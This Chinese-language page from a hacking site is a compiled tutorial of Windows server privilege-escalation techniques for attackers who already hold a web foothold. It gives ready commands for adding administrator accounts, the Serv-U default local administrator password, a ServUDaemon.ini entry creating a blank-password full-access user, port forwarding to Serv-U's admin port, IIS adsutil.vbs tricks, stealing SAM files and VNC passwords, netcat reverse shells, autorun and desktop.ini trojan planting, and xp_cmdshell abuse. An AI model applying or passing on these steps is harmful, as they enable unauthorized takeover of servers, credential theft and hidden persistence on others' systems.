首页    新闻    下载    文档    论坛     最新漏洞    黑客教程    数据库    搜索    小榕软件实验室怀旧版    星际争霸WEB版    最新IP准确查询   
名称: 密码:      忘记密码  马上注册
安全知识 :: 脚本攻防

目前流行的提权方法总结1.


http://www.gipsky.com/
一:检测一下网站的服务器是否开了 3389 远程终端

二:检测一下服务是否用了serv-u (还有是什么版本的)

方法



一:复制一个网站 用 3389 登陆器连接一下 (是否成功)能连接了,拿下服务器的机率,提高 30%了

二:用ftp模式查下一个服务器的版本

开始 -- 运行 -- cmd -- ftp (加你要登陆的网站)

--------------------------------------------------------------------------------

第一步:最简单的方法

看有没有权限,能不能执行命令,行的话直接传个鸽子(随便什么远程控制木马都行,成功率极低.

--------------------------------------------------------------------------------

第二步::寻找有执行的权限目录

c:\\\\winnt\\\\system32\\\\inetsrv\\\\data\\\\

c:\\\\Documents And Settings\\\\All Users\\\\

c:\\\\Program Files\\\\serv-u\\\\

C:\\\\Program Files\\\\Microsoft SQL Server\\\\

这样的目录可以直接上传鸽子,运行

-----------------------------------------------------------------------------------

第三步:传个cmd和开帐号的ftp.exe上去直接加帐号,命令就是你上传目录D:\\\\VMware Workstation\\\\cmd.exe "net user love love /add"

-----------------------------------------------------------------------------------

第四步:asp提权木马直接提权

serv-u 6.3 版本 好象用asp提权木马(不成功)

serv-u 6.2 版本 好象可以

不过提权能不能用asp木马还要看服务器,设置的变态不,假设直接用asp提权成功之后,还是不成功,但是可以在 cmd之下 用这个帐号连接一下ftp (加你提权的网站)

帐号:LocalAdministrator 密码:$ak#.1k;0@p"〉#1@$ak#.1k;0@p

如果成功连接后就可以直接添加管理员帐号了

命令:quote site exec (你添加的帐号) net user 123 123 /ad

quote site exec (把帐号提升到最高权限) net localgroup administartors 123 /add

---------------------------------------------------------------------------------------

第五步:pcaanywhere

C:\\\\Documents And Settings\\\\All Users\\\\Application Data\\\\Symantec\\\\pcAnywhere\\\\

这里下他的GIF文件,在本地安装pcanywhere上去

---------------------------------------------------------------------------------------

第六步:serv-u覆盖提权

本地安装个su,将你自己的ServUDaemon.ini文件用从他那下载下来的ServUDaemon.ini

网上很多教程

----------------------------------------------------------------------------------------

第七步:Serv-U转发端口

给Latte加盐 曾经做个一个(serv-u经典提权全套教程)用到过这个方法,可以学习一下

上传个端口转发工具

命令:(工具名)?v ?l 3333 ?r 43958 127.0.0.1

意思是将3333端口映射到43958端口上。 然后就可以在本地安装一个Serv-u,新建一个服务器,IP填对方IP,帐号为LocalAdministrator 密码为$ak#.1k;0@p"〉#1@$ak#.1k;0@p

连接上后你就可以管理他的Serv-u了

-----------------------------------------------------------------------------------------

第八步:社会工程学之提升提权

把灰鸽子传到上面,然后转移到c盘,就等着管理员运行了,前提你的鸽子必须免杀让我看到一个不清楚的exe程序,老想点开看看,呵呵(方法比较笨)

C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere 看能否跳转到这个目录,如果行那就最好了,直接下它的CIF文件,得到pcAnywhere密码,登陆

C:\WINNT\system32\config进这里下它的SAM,破解用户的密码

c:\winnt\repaire 下是备份用到破解sam密码的软件有LC,SAMinside





C:\Documents and Settings\All Users\「开始」菜单\程序\

看这里能不能跳转,我们从这里可以获取好多有用的信息比如Serv-U的路径,

C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\

看能否跳转到这个目录,如果行那就最好了,直接下它的CIF文件,破解得到pcAnywhere密码,登陆

c:\Program Files\serv-u\

C:\WINNT\system32\config\

下它的SAM,破解密码

c:\winnt\system32\inetsrv\data\

是erveryone 完全控制,很多时候没作限制,把提升权限的工具上传上去,然后执行

c:\prel

C:\Program Files\Java Web Start\

c:\Documents and Settings\

C:\Documents and Settings\All Users\

c:\winnt\system32\inetsrv\data\

c:\Program Files\

c:\Program Files\serv-u\

C:\Program Files\Microsoft SQL Server\

c:\Temp\

c:\mysql\(如果服务器支持PHP)

c:\PHP(如果服务器支持PHP)

运行"cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps"来提升权限

还可以用这段代码试提升,好象不是很理想的,如果主机设置很变态,可以试下在c:\Documents and Settings\All Users\「开始」菜单\程序\启动"写入bat,vbs等木马。

根目录下隐藏autorun.inf

C:\PROGRAM FILES\KV2004\ 绑

D:\PROGRAM FILES\RISING\RAV\

C:\Program Files\Real\RealServer\

rar

Folder.htt与desktop.ini

将改写的Folder.htt与desktop.ini,还有你的木马或者是VBS或者是什么,放到对方管理员最可能浏览的目录下

replace 替换法 捆绑脚本 编写一个启动/关机脚本 重起

删SAM 错

CAcls命令

FlashFXP文件夹Sites.dat Sites.dat.bak Stats.dat Stats.dat.bak



Ring的权限提升21大法!



以下全部是本人提权时候的总结 很多方法至今没有机会试验也没有成功,但是我是的确看见别人成功过的。本人不才,除了第一种方法自己研究的,其他的都是别人的经验总结。希望对朋友有帮助!



1.radmin连接法

条件是你权限够大,对方连防火墙也没有。封装个radmin上去,运行,开对方端口,然后radmin上去。本人从来米成功过。,端口到是给对方打开了。



2.paanywhere

C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ 这里下他的GIF文件,在本地安装pcanywhere上去



3.SAM破解

C:\WINNT\system32\config\ 下他的SAM 破解之



4.SU密码夺取

C:\Documents and Settings\All Users\「开始」菜单\程序\

引用:Serv-U,然后本地查看属性,知道路径后,看能否跳转进去后,如果有权限修改ServUDaemon.ini,加个用户上去,密码为空

[USER=WekweN|1]

Password=

HomeDir=c:\

TimeOut=600

Maintenance=System

Access1=C:\|RWAMELCDP

Access1=d:\|RWAMELCDP

Access1=f:\|RWAMELCDP

SKEYvalues=

这个用户具有最高权限,然后我们就可以ftp上去 quote site exec xxx 来提升权限



5.c:\winnt\system32\inetsrv\data\

引用:就是这个目录,同样是erveryone 完全控制,我们所要做的就是把提升权限的工具上传上去,然后执行



6.SU溢出提权

这个网上教程N多 不详细讲解了



7.运行Csript

引用:运行"cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps"来提升权限

用这个cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps

查看有特权的dll文件:idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll

再将asp.dll加入特权一族

asp.dll是放在c:\winnt\system32\inetsrv\asp.dll (不同的机子放的位置不一定一样)

我们现在加进去cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll"

"C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll"

"C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll""c:\winnt\system32\inetsrv\asp.dll"

可以用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 来查看是不是加进去了



8.脚本提权

c:\Documents and Settings\All Users\「开始」菜单\程序\启动"写入bat,vbs



9.VNC

这个是小花的文章 HOHO

默认情况下VNC密码存放在HKCU\Software\ORL\WinVNC3\Password

我们可以用vncx4破解它,vncx4使用很简单,只要在命令行下输入c:\>vncx4 -W 然后顺序输入上面的每一个十六进制数据,没输完一个回车一次就行了。



10.NC提权

给对方来个NC 但是条件是你要有足够的运行权限 然后把它反弹到自己的电脑上 HOHO OK了



11.社会工程学之GUEST提权

很简单 查看他的拥护 一般来说 看到帐户以后 密码尽量猜 可能用户密码一样 也可能是他QQ号 邮箱号 手机号 尽量看看 HOHO



12.IPC空连接

如果对方真比较白痴的话 扫他的IPC 如果运气好还是弱口令



13.替换服务

这个不用说了吧?个人感觉相当复杂



14.autorun .inf

autorun=xxx.exe 这个=后面自己写 HOHO 加上只读、系统、隐藏属性 传到哪个盘都可以的 不相信他不运行



15.desktop.ini与Folder.htt

引用:首先,我们现在本地建立一个文件夹,名字不重要,进入它,在空白处点右键,选择"自定义文件夹"(xp好像是不行的)一直下点,默认即可。完成后,你就会看到在此目录下多了两个名为Folder setting的文件架与desktop.ini的文件,(如果你看不到,先取消"隐藏受保护的操作系统文件")然后我们在Folder setting目录下找到Folder.htt文件,记事本打开,在任意地方加入以下代码:然后你将你的后门文件放在Folder setting目录下,把此目录与desktop.ini一起上传到对方任意一个目录下,就可以了,只要等管理员浏览了此目录,它就执行了我们的后门

16.su覆盖提权

本地安装个su,将你自己的ServUDaemon.ini文件用从他那下载下来的ServUDaemon.ini 覆盖掉,重起一下Serv-U,于是你上面的所有配置都与他的一模一样了



17.SU转发端口

43958这个是 Serv -U 的本地管理端口。FPIPE.exe上传他,执行命令: Fpipe ?v ?l 3333 ?r

43958 127.0.0.1 意思是将4444端口映射到43958端口上。 然后就可以在本地安装一个Serv-u,新建一个服务器,IP填对方IP,帐号为LocalAdministrator 密码为#1@$ak#.1k;0@p 连接上后你就可以管理他的Serv-u了



18.SQL帐户密码泄露

如果对方开了MSSQL服务器,我们就可以通过用SQL连接器加管理员帐号(可以从他的连接数据库的ASP文件中看到),因为MSSQL是默认的SYSTEM权限。



引用:对方没有删除xp_cmdshell 方法:使用Sqlexec.exe,在host 一栏中填入对方IP,User与Pass中填入你所得到的用户名与密码。format选择xp_cmdshell"%s"即可。然后点击connect,连接上后就可以在CMD一栏中输入你想要的CMD命令了
<< 美国研究人员发现黑客盗用20万网站登录信息 Win 2003下无敌权限提升方法 >>
API:
gipsky.com& 安信网络
网友个人意见,不代表本站立场。对于发言内容,由发表者自负责任。

系统导航

 

Copyright © 2001-2010 安信网络. All Rights Reserved
京ICP备14013333号-8